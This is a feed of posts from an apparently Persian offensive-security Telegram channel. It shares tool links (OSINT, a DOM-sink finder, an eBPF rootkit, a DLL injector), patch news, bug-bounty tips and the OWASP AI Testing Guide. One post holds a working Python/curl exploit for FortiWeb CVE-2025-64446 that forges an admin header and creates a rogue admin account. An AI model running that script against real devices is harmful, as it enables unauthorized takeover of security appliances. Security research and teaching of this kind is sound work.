RadvanSec
سلام و وقت بخیر به همهی همراهان عزیز 🌹 به دلیل ریپورت شدن کانال قبلی @RedTeamApt از این پس فعالیت ما در کانال جدید ادامه خواهد داشت. 🔹 آدرس کانال جدید: @RedTeamApt1 🔹 گروه جدید: @RedTeamGP ممنون از همراهی و حمایت همیشگی شما 🙏✨
کانال یکی از دوستانمون هست که ریپورت شده حتما دوست داشتید دنبالشون کنید مطالب خوبی میزارن 👌
❤3🙏1
Forwarded from KALI
ویندوز یه گاف گنده داده تو بخش گرافیکش؛ همون GDI که مسئول نشون دادن عکس و ایناست. یه سری فایل خاص مثل EMF / EMF+ وقتی باز میشن، ویندوز قشنگ قاطی میکنه چون یه جای کدش درست چک نکرده چی داره میخوره.
نتیجه؟
طرف فقط کافیه یه فایل تصویری عجیب برات بفرسته، تو هم باز کنی، و همون لحظه ویندوز میتونه کرش کنه، هنگ کنه، اطلاعات نشون بده جایی که نباید، یا بدتر — زمینه برای اجرای کد فراهم بشه. خلاصه یه خرابکاری تمیز.
مایکروسافت هم دید اوضاع داغونه، سریع یه پچ امنیتی داده تا این باگ رو ببنده.
اگه ویندوزت آپدیته، تقریباً خیالت راحت باشه.
اگه نه؟ خب دیگه… مثل اینه که در خونه رو باز گذاشته باشی و بگی خدا بزرگه 😅
@kali_signal
نتیجه؟
طرف فقط کافیه یه فایل تصویری عجیب برات بفرسته، تو هم باز کنی، و همون لحظه ویندوز میتونه کرش کنه، هنگ کنه، اطلاعات نشون بده جایی که نباید، یا بدتر — زمینه برای اجرای کد فراهم بشه. خلاصه یه خرابکاری تمیز.
مایکروسافت هم دید اوضاع داغونه، سریع یه پچ امنیتی داده تا این باگ رو ببنده.
اگه ویندوزت آپدیته، تقریباً خیالت راحت باشه.
اگه نه؟ خب دیگه… مثل اینه که در خونه رو باز گذاشته باشی و بگی خدا بزرگه 😅
@kali_signal
❤3👍2
#tools
#OSINT
#Offensive_security
POC : OSINT with LLM
https://github.com/mouna23/OSINT-with-LLM
// This repository demonstrates domain, IP, and email reconnaissance with LLM-powered security reporting
See also:
]-> RAG OSINT Tool
]-> LLM OSINT PoC Tool
]-> OSINT LLM Collector and Analyser
]-> AI-powered subdomain enumeration
tool with local LLM analysis via Ollama
@Radvansec
#OSINT
#Offensive_security
POC : OSINT with LLM
https://github.com/mouna23/OSINT-with-LLM
// This repository demonstrates domain, IP, and email reconnaissance with LLM-powered security reporting
See also:
]-> RAG OSINT Tool
]-> LLM OSINT PoC Tool
]-> OSINT LLM Collector and Analyser
]-> AI-powered subdomain enumeration
tool with local LLM analysis via Ollama
@Radvansec
❤5👍2
سلام بچه ها امیدوارم خوب باشید؛
لایو امروز با بچه ها بررسی کردیم که حتی اگر قراره اتومیشنی داشته باشید باید به بهترین شکل ممکن پیاده سازی بشه با کمترین میس ممکن و بالاترین بازدهی البته هیچوقت آسیب پذیری رو صد درصد بعهده ابزار نندازید . اینکار شدیدا اشتباه هست .
تاجایی باید پیش برید که یک قدم تا کشف آسیب پذیری فاصله داشته باشید و ادامه کار کاملا منوال باید باشه
شما باید حدااقل بتونید روزی ۵ آسیب پذیری ولید ازش گزارش کنید البته رویکردی که خود اتومیشن داره باید درست باشه و پیشنهاد این هست که VPS های متعدد داشته باشید که هرکدوم رویکرد مناسب داشته
باشن تا بتونید آسیب پذیری های متنوعی ازش گزارش کنید
نکته خیلی مهم : تمرکز روی یک آسیب پذیری خاص و نادیده گرفتن مابقی = سم (کار اشتباه)
نکته دوم : با AI ترکیب کنید فارغ از نتیجه ای که داره روند کار خیلی لذت بخش براتون خواهد بود 😁
⭐️ @RadvanSec
لایو امروز با بچه ها بررسی کردیم که حتی اگر قراره اتومیشنی داشته باشید باید به بهترین شکل ممکن پیاده سازی بشه با کمترین میس ممکن و بالاترین بازدهی البته هیچوقت آسیب پذیری رو صد درصد بعهده ابزار نندازید . اینکار شدیدا اشتباه هست .
تاجایی باید پیش برید که یک قدم تا کشف آسیب پذیری فاصله داشته باشید و ادامه کار کاملا منوال باید باشه
شما باید حدااقل بتونید روزی ۵ آسیب پذیری ولید ازش گزارش کنید البته رویکردی که خود اتومیشن داره باید درست باشه و پیشنهاد این هست که VPS های متعدد داشته باشید که هرکدوم رویکرد مناسب داشته
باشن تا بتونید آسیب پذیری های متنوعی ازش گزارش کنید
نکته خیلی مهم : تمرکز روی یک آسیب پذیری خاص و نادیده گرفتن مابقی = سم (کار اشتباه)
نکته دوم : با AI ترکیب کنید فارغ از نتیجه ای که داره روند کار خیلی لذت بخش براتون خواهد بود 😁
⭐️ @RadvanSec
🔥8👏1
RadvanSec
سلام بچه ها امیدوارم خوب باشید؛ لایو امروز با بچه ها بررسی کردیم که حتی اگر قراره اتومیشنی داشته باشید باید به بهترین شکل ممکن پیاده سازی بشه با کمترین میس ممکن و بالاترین بازدهی البته هیچوقت آسیب پذیری رو صد درصد بعهده ابزار نندازید . اینکار شدیدا اشتباه…
سلام دوستان لایو دوره خصوصی بوده و لایو پابلیک رسمی کانال نبوده اگر دوست دارید ری اکشن بدید یک لایو پابلیک بریم و کامل AI + Security و agent هایی که خودتون میتونید بسازید رو باهم درموردش صحبت کنیم
👍25👎1🔥1
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! 😎
Check it out! 👇
https://github.com/kevin-mizu/domloggerpp
@Radvansec
Check it out! 👇
https://github.com/kevin-mizu/domloggerpp
@Radvansec
❤4👍1
CVE-2025-64446 FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass
So, based on THIS, you can get something like this:
⭐️ @RadvanSec
So, based on THIS, you can get something like this:
import base64, json, subprocess
header = base64.b64encode(json.dumps({
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}).encode()).decode()
payload = json.dumps({
"data": {
"q_type": 1,
"name": "note2",
"access-profile": "prof_admin",
"password": "note2",
"comment": "automated RCE"
}
})
cmd = [
"curl", "--path-as-is", "-sk",
"-H", f"CGIINFO: {header}",
"-H", "Content-Type: application/json",
"--data", payload,
"https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY
Output from the box:
{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }
⭐️ @RadvanSec
Gist
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446 - CVE-2025-64446.md
❤3👍2
Forwarded from GO-TO CVE
سوال ردتیم :
یک AD کامل پچشده (Server 2025 + Defender for Identity + Tier 0 isolation + LDAP signing/enforcement + SMB signing) داری.
بدون credential اولیه، بدون physical، بدون zero-day عمومی، حداکثر چند روز طول میکشه تا Golden Ticket بگیری؟
chain کامل رو بنویس (از initial foothold تا DCSync، فقط با تکنیکهای ۲۰۲۵ که الان کار میکنن).
یک AD کامل پچشده (Server 2025 + Defender for Identity + Tier 0 isolation + LDAP signing/enforcement + SMB signing) داری.
بدون credential اولیه، بدون physical، بدون zero-day عمومی، حداکثر چند روز طول میکشه تا Golden Ticket بگیری؟
chain کامل رو بنویس (از initial foothold تا DCSync، فقط با تکنیکهای ۲۰۲۵ که الان کار میکنن).
❤🔥3❤2
Forwarded from ReverseEngineering
A Linux eBPF rootkit with a backdoor C2 library injection execution hijacking persistence and stealth capabilities
https://github.com/h3xduck/TripleCross
@reverseengine
https://github.com/h3xduck/TripleCross
@reverseengine
GitHub
GitHub - h3xduck/TripleCross: A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and…
A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and stealth capabilities. - h3xduck/TripleCross
❤3
Forwarded from PentesterLand Academy - Public
دوس داری یک ه.کر قدرتمند با توانایی بالا بشی؟
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی 😉
دوس داشتی بفرس برای دوستات که میخوان سریع حکر بشن
https://www.instagram.com/reel/DRkNUj8Db2L/?igsh=MXdocTZ4azAyODhpMg==
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی 😉
دوس داشتی بفرس برای دوستات که میخوان سریع حکر بشن
https://www.instagram.com/reel/DRkNUj8Db2L/?igsh=MXdocTZ4azAyODhpMg==
Instagram
@pentesterland
دوس داری یک ه.کر قدرتمند با توانایی بالا بشی؟
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی…
دوس داری یک ه.کر قدرتمند با توانایی بالا بشی؟
میخوای صفر تا صد از ابزار و هوش مصنوعی استفاده کنی؟
این ویدیو مخصوص اینه که بهت تو این موضوع کمک کنه که بتونی از این روش استفاده کنی که با سریع ترین حالت ممکن یک ه.کر توانمند در هر حوزه ای که دوس داری بشی…
❤5👍2
OWASP_AI_Testing_Guide.pdf
6.2 MB
#MLSecOps
#Whitepaper
#Threat_Modelling
"OWASP AI Testing Guide", Version 1, Nov. 2025.
]-> Repo
// This Guide is designed to serve as a comprehensive reference for software developers, architects, data analysts, researchers, auditors and risk officers, ensuring that AI risks are systematically addressed throughout the product development lifecycle
@Radvansec
#Whitepaper
#Threat_Modelling
"OWASP AI Testing Guide", Version 1, Nov. 2025.
]-> Repo
// This Guide is designed to serve as a comprehensive reference for software developers, architects, data analysts, researchers, auditors and risk officers, ensuring that AI risks are systematically addressed throughout the product development lifecycle
@Radvansec
❤8
Forwarded from PentesterLand Academy - Public
اگه میخوای بیشتر XSS هات P2,P1 بشن از نکته زیر استفاده کن
۹۹ درصد باگ هانترا (صرفا باگ هانترا) راجب این تکنیک چیزی نمیدونن ولی وقتی ترکیبش میکنی تو گزارشت تریاژر خوف میکنه رسما
سعی کن هکر باشی ❤️🔥😉
https://x.com/pentesterlanden/status/1994795913488077214?s=46
۹۹ درصد باگ هانترا (صرفا باگ هانترا) راجب این تکنیک چیزی نمیدونن ولی وقتی ترکیبش میکنی تو گزارشت تریاژر خوف میکنه رسما
سعی کن هکر باشی ❤️🔥😉
https://x.com/pentesterlanden/status/1994795913488077214?s=46
X (formerly Twitter)
PentesterLand (@PentesterLandEn) on X
Consider incorporating SVG Smuggling and HTMLSmuggling vectors into your bug bounty reports(XSS).
They frequently result in higher-impact findings and increased bounty rewards.
Trust me😉
by these techniques, over 70% of them escalated to P2/P1 severity
#bugbountytips…
They frequently result in higher-impact findings and increased bounty rewards.
Trust me😉
by these techniques, over 70% of them escalated to P2/P1 severity
#bugbountytips…
❤7
This media is not supported in your browser
VIEW IN TELEGRAM
Injecting a DLL into an Explorer process using icons
https://github.com/d419h/IconJector
⭐️ @RadvanSec
https://github.com/d419h/IconJector
⭐️ @RadvanSec
❤3👍1
Forwarded from لیان - آموزش امنیت و تستنفوذ
امروز روز جهانی امنیت سایبری است؛ روزی برای یادآوری یک واقعیت مهم:
هر کلیک میتواند مخاطرهآمیز باشد، هر ایمیل بالقوه یک تهدید است و هر بیاحتیاطی ممکن است پیامدهای جدی و جبرانناپذیری بهدنبال داشته باشد.
امنیت صرفاً به ابزارها وابسته نیست؛ بخش بزرگی از آن به رفتار و دقت ما بازمیگردد.
به همین دلیل، امروز فرصتی مناسب است تا چند اقدام ساده اما حیاتی را مرور کنیم: استفاده از گذرواژههای امن و پیچیده، پرهیز از باز کردن پیامها و پیوستهای مشکوک، و توجه به ارزش واقعی دادههایی که در اختیار داریم.
در جهانی که هر روز بیش از گذشته دیجیتالی میشود، توجه به امنیت اطلاعات باید به یک عادت جدی و همیشگی تبدیل شود.
💻 گروه لیان
☺️ https://liangroup.net/
☺️ @AcademyLian
هر کلیک میتواند مخاطرهآمیز باشد، هر ایمیل بالقوه یک تهدید است و هر بیاحتیاطی ممکن است پیامدهای جدی و جبرانناپذیری بهدنبال داشته باشد.
امنیت صرفاً به ابزارها وابسته نیست؛ بخش بزرگی از آن به رفتار و دقت ما بازمیگردد.
به همین دلیل، امروز فرصتی مناسب است تا چند اقدام ساده اما حیاتی را مرور کنیم: استفاده از گذرواژههای امن و پیچیده، پرهیز از باز کردن پیامها و پیوستهای مشکوک، و توجه به ارزش واقعی دادههایی که در اختیار داریم.
در جهانی که هر روز بیش از گذشته دیجیتالی میشود، توجه به امنیت اطلاعات باید به یک عادت جدی و همیشگی تبدیل شود.
💻 گروه لیان
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
CVE-2025-47776 - 1day, MantisBT vulnerable to authentication bypass for some passwords due to PHP type juggling
#Pruva today reproduction and exploit.
Exploit
⭐️ @RadvanSec
#Pruva today reproduction and exploit.
Exploit
⭐️ @RadvanSec
❤4👍2🔥1👏1
Sin0x001
Web Application Security-Persian.pdf
کتاب web application رو گفتید بزارم ترجمش رو یکی از بچه ها زحمت کشیده کانالشون :
@web_articles
@web_articles
👍4❤2